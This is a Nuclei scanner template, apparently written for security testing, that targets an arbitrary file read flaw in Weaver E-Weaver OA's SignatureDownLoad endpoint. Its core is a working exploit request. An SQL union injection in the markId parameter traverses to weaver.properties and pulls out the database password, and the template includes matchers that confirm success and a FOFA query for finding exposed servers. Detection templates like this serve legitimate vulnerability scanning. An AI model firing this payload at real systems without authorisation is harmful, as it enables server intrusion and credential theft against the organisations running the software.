id: weaver-signaturedownload-lfi

info:
  name: OA E-Weaver SignatureDownLoad - Arbitrary File Read
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the E-Weaver SignatureDownLoad interface of Panwei OA. An attacker can read any file on the server through the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="泛微-E-Weaver"
  tags: ecology,weaver,oa,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DriverClasses"
          - "ecology.password"
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "markPicture.jpg"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a004830460221009c7c7fbcc6408d7a1d23b362176285fb7d990fd0b0b5785b7235a8a8304ef38a022100e87911cec4d1ab35b9459482066c0fb80c90ccc0bb05850c8e4621645ddae578:922c64590222798bb761d5b6d8e72950
